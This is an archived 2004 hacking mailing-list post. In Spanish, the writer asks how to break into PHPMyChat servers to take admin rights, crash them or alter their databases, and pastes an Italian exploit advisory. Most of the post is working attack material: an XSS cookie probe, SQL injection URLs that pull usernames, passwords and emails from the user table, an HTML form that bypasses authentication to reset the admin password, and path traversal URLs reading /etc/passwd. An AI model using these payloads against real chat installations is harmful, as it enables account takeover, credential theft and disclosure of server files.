[HACK] Hack PHPMyChat Vulnerabilities

villalobo at cubatel.cu villalobo at cubatel.cu
Mon Jul 12 20:01:24 CEST 2004


Hola amigos... me pregunto si hay algun forma de hackear este tipo de
chat's en PHP es decir PHPMyChat algo para cojer privilejios de
administrador tumbarlo o alterra base de datos no se algo, miren por
ejemplo tengo algo aqui HTML Ingection y SQL Ingection algo de eso u otros
por si alguno le interesa los que tengo aqui les van.... y diganme si me
pueden ayuidar... algunos de estos no me funcionan... se los voy a poner
como mismo lo baje de la web...

Vulnerabilità multiple sono state scoperte in PHPMyChat, per l'esattezza:

- HTML Injection
- SQL Injection
- Authentication Bypass
- File disclosure

Più in concreto qui sotto ci sono degli esempi pratici:

HTML Injection
Codice:
<INPUT TYPE="TEXT" NAME="C" VALUE="#FF0000">[CODE]"> <INPUT TYPE="TEXT"
NAME="C" VALUE="#FF0000"><script>alert(document.cookie)</script><a "">


SQL Injection
Codice:
http://www.example.com/chat/usersL.php3?L=russian&R='[SQL]
http://www.example.com/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20username,null,null,null%20FROM%20%20c_reg_users%20/*
http://www.example.com/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20password,null,null,null%20FROM%20%20c_reg_users%20/*
http://www.example.com/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20email,null,null,null%20FROM%20%20c_reg_users%20/*


Authentication bypass
Codice:
<HTML> <HEAD> <TITLE>phpMyChat exploit</TITLE> </HEAD> <BODY> <FORM
ACTION="http://[TARGET]/chat/edituser.php3" METHOD="GET"
AUTOCOMPLETE="OFF" NAME="EditUsrForm"> <INPUT type="hidden"
name="FORM_SEND" value="1"> <INPUT type="hidden" name="AUTH_USERNAME"
value="admin"> <INPUT type="hidden" name="AUTH_PASSWORD" value="null">
<!-- INSERT --> <INPUT type="hidden" name="do_not_login" value="false">
<!-- END INSERT --> <INPUT TYPE="hidden" NAME="L" VALUE="russian"> <INPUT
TYPE="text" NAME="U" VALUE="admin">NAME *<BR> <INPUT TYPE="text"
NAME="PASSWORD" VALUE="hex_pass">NEW PASS *<BR> <INPUT TYPE="text"
NAME="FIRSTNAME" VALUE="">FIRST NAME<BR> <INPUT TYPE="text"
NAME="LASTNAME" VALUE="">LAST NAME<BR> <INPUT TYPE="radio" NAME="GENDER"
VALUE="1" >male<BR> <INPUT TYPE="radio" NAME="GENDER" VALUE="2"
>female<BR> <INPUT TYPE="text" NAME="COUNTRY" VALUE="">COUNTRY<BR> <INPUT
TYPE="text" NAME="WEBSITE" VALUE="">WEBSITE<BR> <INPUT TYPE="text"
NAME="EMAIL" VALUE="you at email.ru"> <INPUT type="checkbox" name="SHOWEMAIL"
value="1" >show e-mail in public information<BR> <INPUT TYPE="submit"
NAME="submit_type" VALUE="Change"> </FORM> </BODY> </HTML>


File disclosure
Codice:
http://www.example.com/chat/admin.php3?From=admin.php3&What=Body&L=russian&user=[USER]&pswd=[YOU
HASH PASSWORD]&sheet=[FILE]%00
http://www.example.com/chat/admin.php3?From=admin.php3&What=Body&L=russian&user=admin&pswd=[YOU
HASH PASSWORD]&sheet=/../../../../../../etc/passwd%00


Codice:
http://www.example.com/chat/admin.php3?From=admin.php3&What=[FILE]%00&L=russian&user=[USER]&pswd=[YOU
HASH PASSWORD]&sheet=1
http://www.example.com/chat/admin.php3?From=admin.php3&What=/../../../../../../etc/passwd%00&L=russian&user=admin&pswd=[YOU
HASH PASSWORD]&sheet=1











More information about the hacking mailing list